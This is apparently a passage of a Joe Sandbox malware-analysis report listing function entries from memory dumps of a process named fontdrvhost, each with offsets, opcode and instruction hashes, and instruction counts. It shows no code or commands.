Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd76792dedcb1fea90cfb5f835b3dfd94ff13179641e97178b5b60ba107173ec
Instruction ID: be16edb9d7aeee8efd915d5c6ec33b3482a5512122e3dba0cc9da688e53d42b3
Opcode Fuzzy Hash: cd76792dedcb1fea90cfb5f835b3dfd94ff13179641e97178b5b60ba107173ec
Instruction Fuzzy Hash: 03313C30A1E54ECFDBA8DBA484A16BD77B1FF44301F52417AE42ED71A1DB386A608B41

Function 00007FFD9BC77C4B Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed28f027eabab193eeda516708f3ba996080bf772db79758b224168056d75e2
Instruction ID: 7c7e30805f8d47beb8b1d3954197d0454d1fb1cc9bc235f2c658849da1a406b5
Opcode Fuzzy Hash: bed28f027eabab193eeda516708f3ba996080bf772db79758b224168056d75e2
Instruction Fuzzy Hash: 16319271B1990E8FDB58EBACC4A19BCB7E1FF59310B054279D05ED72A2CB24B912C780

Function 00007FFD9B881171 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eef3df9d0096b7687d5a7300ca61d3b3ad6fd3e4783f35acff6e4bccfb96cd8
Instruction ID: 0239cb2a40a62904da5b15997afc8ec8ea5de202c07bbb73dfd49127ff552177
Opcode Fuzzy Hash: 1eef3df9d0096b7687d5a7300ca61d3b3ad6fd3e4783f35acff6e4bccfb96cd8
Instruction Fuzzy Hash: CC31B330A0DA8E8FDB56EB64C8649B97BF0FF5A300B0905FBC019D71A2DE38A945C751

Function 00007FFD9B880998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1b69c04e47f6fe0e72f49156210118fa45effd6683ccfa19c9a14bb548c538
Instruction ID: 6b3945da3e89468f6e546e5bc093905b29a81731babca87af6c0c42f2fd0dae1
Opcode Fuzzy Hash: 5d1b69c04e47f6fe0e72f49156210118fa45effd6683ccfa19c9a14bb548c538
Instruction Fuzzy Hash: AA212920F29D6D0FE798B7AC946967572C2EB9C315F5100B9E41DC32FAEC78AC414281

Function 00007FFD9BC7BD29 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f89bd01d6c2241b0b4cbd73080a4b4e51b0517e4eee497aabb40da6802bb65
Instruction ID: 77275f2c4a803ecfc6ac870e514d9ea89dd11cb880843890e2ff44922e68387c
Opcode Fuzzy Hash: c6f89bd01d6c2241b0b4cbd73080a4b4e51b0517e4eee497aabb40da6802bb65
Instruction Fuzzy Hash: FB314C74A1991D8FDFA8DB6884A1BEDB7B1FF68310F0000BDD04EE3295CE356A818B00

Function 00007FFD9BC77D1E Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdb5b3dd7eab7f33ac6b888c463f4d917f903fa5f3ecb63660ab0ddf4311faa
Instruction ID: 0383d974c22ea940976b575d13185123d429010c9efdd4836db0f699087a36e8
Opcode Fuzzy Hash: dbdb5b3dd7eab7f33ac6b888c463f4d917f903fa5f3ecb63660ab0ddf4311faa
Instruction Fuzzy Hash: 6D21F971B0E94D4FE755E7B848B2ABC77E1FF55310F1501BAD05DC75A2DA1869028350

Function 00007FFD9BC74400 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca00a08c4f1bc42c8087324db8dbee6102714330e9407d682471e659c220e40
Instruction ID: 4bd527eb3cf09cdad16ea50dd4b15fd1268b66c45dc3bc1285e85a2adb378990
Opcode Fuzzy Hash: 6ca00a08c4f1bc42c8087324db8dbee6102714330e9407d682471e659c220e40
Instruction Fuzzy Hash: DF315B20A1E5EA5BE739826844F097C7B61EF5130072982FED09ACB0EBC91CB581E351

Function 00007FFD9BC797B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715d91426446690b5bdf4f62829ca02e1a435eb8a6458a28c67611c00c610b54
Instruction ID: f63e44b3264554fad85c61295cccea1b0d58786ac19dc29b7d6701eceaf99f09
Opcode Fuzzy Hash: 715d91426446690b5bdf4f62829ca02e1a435eb8a6458a28c67611c00c610b54
Instruction Fuzzy Hash: 24315210A1D5DA5AE739837444B85787F91EF52310F1945FAC08FCB4EBC4ACBA85C761

Function 00007FFD9BC7BD72 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b80faa4ff0d5fc77326a3ff5937095cfc5fc4d6db05bc7a1ccacead3363f532
Instruction ID: c29b6ac5570ccef75f9cf875cbc6b7e76fa2fcbf61e7a83bb80d850896e78bea
Opcode Fuzzy Hash: 5b80faa4ff0d5fc77326a3ff5937095cfc5fc4d6db05bc7a1ccacead3363f532
Instruction Fuzzy Hash: 8F210835A0991D8FDF99DB68C8A1AEDB3B1FF68310F1001ADD04EE3295CA35AA41CB00

Function 00007FFD9BC71822 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0b782027eaa0b262873091f6f956549979214040d1091cc7c320528d729890
Instruction ID: a7abf67de89d47c0e3dd8cab2048e76f3504ce6ef8b892b627d8122945819173
Opcode Fuzzy Hash: 4e0b782027eaa0b262873091f6f956549979214040d1091cc7c320528d729890
Instruction Fuzzy Hash: C0210C71E1591D9FDF98DB58C4A5AECB3B1FF68300F0141AED00EE3291CA35AA418B50

Function 00007FFD9BC7B225 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b58eaf1b71a76412f95f3e751f3d9ca31604990645ab8544dc6ece4036e575cc
Instruction ID: f69ae1c715b96dcfb26e804c6158ecaf576ad6c1d01675c2cac8186cb0532322
Opcode Fuzzy Hash: b58eaf1b71a76412f95f3e751f3d9ca31604990645ab8544dc6ece4036e575cc
Instruction Fuzzy Hash: A8215330E1D94E8FCB94DFA8D8A09EDBBB1FF48311F510179D00AE72A1DA246941CB50

Function 00007FFD9BC70CE9 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a451473016b8ac16447f45d8034f3478e87e46d3788005cc9ea90544b646de3
Instruction ID: f2230557274ae9043406dce067d7d2d10cbeabfaeac5fb7c7dd6ea7cf5569a24
Opcode Fuzzy Hash: 5a451473016b8ac16447f45d8034f3478e87e46d3788005cc9ea90544b646de3
Instruction Fuzzy Hash: 13211074A19A1D9FDF54EBA8C8909FDB771FF68740F510179D00AE32A1DE2579018750

Function 00007FFD9BC7CEC4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0032b3a6e9bd7e82e0f5886e8a98ac006a84802c191f70bd2f3904a281e0068f
Instruction ID: 7eb1eb7e8898dd81491458590cbde9215bb66ca87eaa6241df746edb515bb85b
Opcode Fuzzy Hash: 0032b3a6e9bd7e82e0f5886e8a98ac006a84802c191f70bd2f3904a281e0068f
Instruction Fuzzy Hash: A4112771B0D94D4FDB58E7A898627ECB7E0EF55310F1501BAE14EC72D3DE186A428380

Function 00007FFD9BC7CD19 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da43712999568228b3c9013a32ab731fd0962af46f9de8f0b161bececacc7a34
Instruction ID: 7cff7b4713e2b02cfc2a48a6b2eb7d3fe26db30a9bf39401a4bdb150769d62ee
Opcode Fuzzy Hash: da43712999568228b3c9013a32ab731fd0962af46f9de8f0b161bececacc7a34
Instruction Fuzzy Hash: 27115621B0EA8E5FE37192F848A46AF3F90EF57301B0505BAE089D71A2DD082A068391

Function 00007FFD9BC77B85 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82222cb8dab77a385415337b30dcf8df6c6383e567c6fb4dbf336ac2d31181a0
Instruction ID: 2861a2bd34a38340dd15808b75ca0b93c59e84a0aae9564bfd83d7ccbd818b49
Opcode Fuzzy Hash: 82222cb8dab77a385415337b30dcf8df6c6383e567c6fb4dbf336ac2d31181a0
Instruction Fuzzy Hash: 81115931B0F78D0FE77496B448A95FD3BE1EF5A350F06057BD00AD71A2ED5869068341

Function 00007FFD9BC76C69 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421bd67c95f52a4c7db649bc37a28df704b61f0ac7db56dd1f6fc6bd81083bc9
Instruction ID: e7f2cc5a2ecf4da431c668a4b6bf9bd4312423baee8b82e370ded98b913ecff6
Opcode Fuzzy Hash: 421bd67c95f52a4c7db649bc37a28df704b61f0ac7db56dd1f6fc6bd81083bc9
Instruction Fuzzy Hash: 4C210C71E1950D9FDBACDB68C4A6AADB7A1EF58300F4100BDE04FD72A1DE74A9418B40

Function 00007FFD9BC74430 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba63e36f02c2304fc167feae4a0bd63309580ba6b5d619c0e82b1c2128502ca
Instruction ID: c5499f3bd00520e346c0a748614376e275948f48e766172be68b4a2deeddbe84
Opcode Fuzzy Hash: aba63e36f02c2304fc167feae4a0bd63309580ba6b5d619c0e82b1c2128502ca
Instruction Fuzzy Hash: B9110A20A1D47E97F63C96A884F09BC7255FF90301B35867DD05F8B4EACD2CBA81A790

Function 00007FFD9BC78860 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfcfc730e64f14451d993301a80eb5a6ff0dda16c6c6920e86688c18fe9c41ce
Instruction ID: 4d8c6ad2a2b0a05a0da647bc7e72a48c152e7bbda17c2d502e24066369a4d942
Opcode Fuzzy Hash: bfcfc730e64f14451d993301a80eb5a6ff0dda16c6c6920e86688c18fe9c41ce
Instruction Fuzzy Hash: 2F11C42071DA8D4ECB99EB7995619FA7B91EF49210B440ABAD58EC30E3DE14F51AC380

Function 00007FFD9B882A0E Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e71059baf389c5087c502d5c498a7e5d2a3343278e38700e34f8fdc1068c8c
Instruction ID: 7b087288f849d0ceaa587a0613d3fb6879f662fcf53d14a0f9b59e00cd01a6f9
Opcode Fuzzy Hash: 18e71059baf389c5087c502d5c498a7e5d2a3343278e38700e34f8fdc1068c8c
Instruction Fuzzy Hash: 56113331B1DD0E4FEF64EFE8C468AB823D2EF98700F520175D05ED31A2DD38AA418600

Function 00007FFD9B88294E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b479c2d0e661453c5b7223fceabe4ce67cd8477549b8f39e63e84fcc29d913
Instruction ID: 012f0dd988d8ad625fab44115988bc13bf390209a191c1cdb66d46febd90838c
Opcode Fuzzy Hash: c6b479c2d0e661453c5b7223fceabe4ce67cd8477549b8f39e63e84fcc29d913
Instruction Fuzzy Hash: 1B113321F1DD1E4FEBB4EB9888686B86291FF4C710F5601B5D46DE32B2EE386E414740

Function 00007FFD9BC7CE08 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df359a8b9d03441c614290d129347f2ceb586a3af6dc74548068f78635a13b47
Instruction ID: 2c41f12fb7ab35976b5acb5e4fde0ec363f5368810680cf02ae5261a4a083672
Opcode Fuzzy Hash: df359a8b9d03441c614290d129347f2ceb586a3af6dc74548068f78635a13b47
Instruction Fuzzy Hash: 7211DF30B0994E8FD758EBA881A096CF7A1FF89310B5042A9D02ED7292CF24B911CB80

Function 00007FFD9BC727DC Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f5fbee5b9c70cd14d6f56cca6df2f37b21b22d7255fe3c6684db4ab5a8f47c
Instruction ID: 497ab457e8b5c746b21acd2039e5063d4c88f5aa04dc7f4fbb8926a613a3bdb3
Opcode Fuzzy Hash: 63f5fbee5b9c70cd14d6f56cca6df2f37b21b22d7255fe3c6684db4ab5a8f47c
Instruction Fuzzy Hash: A8012B32F0F68D0FE77496F804655BD3BE1EF9B350F05057AE00ADB1A2ED656A058341

Function 00007FFD9BC7332E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37fcb53a11a5f6b9bfde21d1886d8ebea3c4d7be16e9359c1f97825a9088dd6
Instruction ID: 65f48b666d9c0da60382355cb1b35a95fd7c7fb30d904384d77274bf35e6357a
Opcode Fuzzy Hash: e37fcb53a11a5f6b9bfde21d1886d8ebea3c4d7be16e9359c1f97825a9088dd6
Instruction Fuzzy Hash: AC11483130D58E4FD75ACF78D4A57F97B91EB85310F1805AADA8AC32E2CA15A626C780

Function 00007FFD9BC76C8E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c787e44aa709970115ebf47146452fef11f5b50bfc285e39a5739032a6503a
Instruction ID: 621408f05f19c87fa7be182f68347213c25b6bb27a71e04a02c6221bbd52b116
Opcode Fuzzy Hash: 87c787e44aa709970115ebf47146452fef11f5b50bfc285e39a5739032a6503a
Instruction Fuzzy Hash: 53111930A1990D8FDB9CDB68D465AADB7A1EB58314F4101BEE04EE32A1CE74A9818B40

Function 00007FFD9BC7D89E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578a36c9d7ca8c37d7fc6c1d65bf827c1661314db8a4252dacd4fdbc731d3f8c
Instruction ID: 076af7c9b7ad109c3823de36a4d6f55eb7fab0b2a7437ee2b723bc1e2b8dfdb1
Opcode Fuzzy Hash: 578a36c9d7ca8c37d7fc6c1d65bf827c1661314db8a4252dacd4fdbc731d3f8c
Instruction Fuzzy Hash: 3111443134D68D4FD749CFACD4A57E83B90DF86220F1809AAEA49C72E2C965A658C340

Function 00007FFD9B880C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f92031c1d92ef98d3513fd0482377ee2bf6eb88fa4605258b6585a31972b57
Instruction ID: 8e315469fb8090def23a4157c27a8c1d68d4a99293051346b5755fb913190fa6
Opcode Fuzzy Hash: 70f92031c1d92ef98d3513fd0482377ee2bf6eb88fa4605258b6585a31972b57
Instruction Fuzzy Hash: 78110631B1EA4D8FE7129FB4882119C7BB0EF56710F0644B3C054DB1A2D5382B498790

Function 00007FFD9BC72999 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab73c48f8841b8325958577676a09862fe076eb7f9d9d97cab9e496de5dc125
Instruction ID: 9a445ba8e06863a7c4448b2522f0a2b9d824201c385fa4e083ee23e3b2803664
Opcode Fuzzy Hash: 4ab73c48f8841b8325958577676a09862fe076eb7f9d9d97cab9e496de5dc125
Instruction Fuzzy Hash: 61018431B1998C8FDB55EBF898A26ECBBB1EF4A310B050569D04ED71A3DA245912C740

Function 00007FFD9BC71538 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244391b1d7c0843d6933eef85f72d188f18dac8f0fb2535fab31c9441f4f8fa3
Instruction ID: 13c0df0745e17db219dfa3206f223304db5336bad4dfb9fa7dd6a41d0dc0ce2a
Opcode Fuzzy Hash: 244391b1d7c0843d6933eef85f72d188f18dac8f0fb2535fab31c9441f4f8fa3
Instruction Fuzzy Hash: E7115E62F5F59F86F6FC56F928B21BC5941EF55710F260276D41F470E19C4C27412682

Function 00007FFD9BC7CE38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9c43a73d8a0bdea18313f14a74789c276fe094cdaaa03ffd6006284a255ed9
Instruction ID: 0e8adf2954996361ba1e402eabe4240bc6da07029ec3613cc98454f2a15db005
Opcode Fuzzy Hash: 4f9c43a73d8a0bdea18313f14a74789c276fe094cdaaa03ffd6006284a255ed9
Instruction Fuzzy Hash: 9C016130B19A4E8FCB58DBAC85A196CB3A2FF89700B154268D05AD3696CE24BD12C785

Function 00007FFD9BC76145 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67714c43c4c2a914ef689a71c66e1ecd6443f83611f44b5065c26baf53b993dc
Instruction ID: d29c81e7e8ea41281fb5b3256e33c77e32f728a626a2334d26dc70bca9981005
Opcode Fuzzy Hash: 67714c43c4c2a914ef689a71c66e1ecd6443f83611f44b5065c26baf53b993dc
Instruction Fuzzy Hash: 5911DA74E1991EDFCB98DB98D4A49FDBBB1FF58300F510179E00AE32A1DA356941CB50

Function 00007FFD9B880C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd3ec572e717ef32bf7f65ca606ec751998278ac4ea6d773a01082de461b169
Instruction ID: 70c58308fa89f6ec7d16071873fcc47ad16e776503b1f480469c45b62507cd37
Opcode Fuzzy Hash: 3cd3ec572e717ef32bf7f65ca606ec751998278ac4ea6d773a01082de461b169
Instruction Fuzzy Hash: 3D01ED32B1EA8C8FE7229FA4882019C7BB0EF56710F0640F3D054DB2A2D9386B498790

Function 00007FFD9BC7607D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527fcc8660d48d619b000fb39417f70fe2a7fd794c42367be5a6fe2b7532c03c
Instruction ID: 92956e8f1fe5970ebf438f69404d5b09e54314c59dfff53fdc51a05a2a8083b9
Opcode Fuzzy Hash: 527fcc8660d48d619b000fb39417f70fe2a7fd794c42367be5a6fe2b7532c03c
Instruction Fuzzy Hash: 1AF0A93144E2C44FD3129B748C29991BFE0EF1721070E82EED0C9CB4B3C21D8486C701

Function 00007FFD9B880C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d215cf44c839fe5fe1e0f627055824f808eada76360636272eb0d1c3ae9472ea
Instruction ID: 944eadd8ead87be530bfca1fcd37c08bdaee1408a7c8a91322d84a0a9c123244
Opcode Fuzzy Hash: d215cf44c839fe5fe1e0f627055824f808eada76360636272eb0d1c3ae9472ea
Instruction Fuzzy Hash: 4E019E31E1EA8D9FE712DFB4886019D7BB0EF16714F1641F3D054DB2A2E9386B458781

Function 00007FFD9BC71667 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e421521331d21acbdad0439a3bfce13ddfee1ba6c6fa14d764ef8e026a3bf9
Instruction ID: 0f60890639d7607e417b52588babd02c071a3f3af97a17c675f00f6c86e3c528
Opcode Fuzzy Hash: 22e421521331d21acbdad0439a3bfce13ddfee1ba6c6fa14d764ef8e026a3bf9
Instruction Fuzzy Hash: D8010CB090895E8FCFA8DF14C494FA877B1EB64301F1441EDD00DE3291DA30AA80CF11

Function 00007FFD9BC76F62 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30610c7a03cc53316e70339aaa572cbae9dc47a6ff7cfce15c8662f76da46b13
Instruction ID: a2eb03e098a4c50fe3e5c92bf9b475b0c8dbff4443de2dc6bfb0cabfa7d8abf4
Opcode Fuzzy Hash: 30610c7a03cc53316e70339aaa572cbae9dc47a6ff7cfce15c8662f76da46b13
Instruction Fuzzy Hash: 05F0C83254F2C95FD7228BB088615D93FB0EF43304B1A41F6E045C70A2C96C5606C351

Function 00007FFD9BC7176C Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
